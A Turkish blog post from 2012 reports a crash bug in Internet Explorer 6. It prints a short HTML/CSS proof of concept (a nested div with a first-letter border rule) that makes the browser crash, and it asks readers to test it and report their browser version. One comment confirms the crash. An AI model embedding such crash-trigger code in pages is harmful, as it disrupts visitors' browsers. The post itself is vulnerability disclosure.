Internet Explorer’da <DIV> açığı

  12/30/2012, Yazar: Özgür Koca, Kategori: Güvenlik, Windows

Şuan itibariyle internet explorer’in “Internet Explorer Version 6.0.2900.2180.xpsp_sp2″ versiyonunda bir  HTML etiketi olan <DIV> den kaynaklanan ve iexploer.exe nin o anki kopyasının çökmesine yol açan bir kodlama hatası var. Explorer da ki açık henüz DOS (Denial of Service) kategorisinde ama “Remote Code Execution” için exploit yazılmadığından/yazılamayacağından emin olamayız.

Exploitin kodunu yayınlayan siteye ulaşabilirsiniz.

<head>
<
style><!–
#page div p:first-child:first-letter {
border-bottom: 2px ridge #F5DEB3;
}
//–>

</
style>
</
head>
<
body><div id=“page”><div><p><strong>Tank</strong></p>

Yukarıdaki html kodlarını bir htm dosyasına kaydedip internet explorer’da görüntülemeye calıştığımızda aşağıdaki gibi bir hata mesajı alıyoruz ve ardından pencere kapatılıyor.

windows guvenlik  Internet Explorerda <DIV> açığı

Kodu buraya tıklayarak deneyebilirsiniz.

Exploitin yayınlandığı sayfa 

Önemli: Internet Exploer’ın hangi versiyonlarının etkilendiğini anlamamız açısından kodu test edip kullandığınız tarayıcının versiyon numarasıyla birlikte sonucu yazarsanız yararlı olacaktır.

Yazan: Tankado

ana sayfam haydex com olarak açılıyor (66)






Yorumlar

  1. Yasin diyor ki:

    IE 6′da 6.0.2900.2180 SP2 sistem bu hatadan etkileniyor.



  • Hakkında | İletişim | Wordpress.org | RSS | Abone Ol

  • (c) 2005-2009 Wordpress Tema: Tankado & Theme by Tankado.com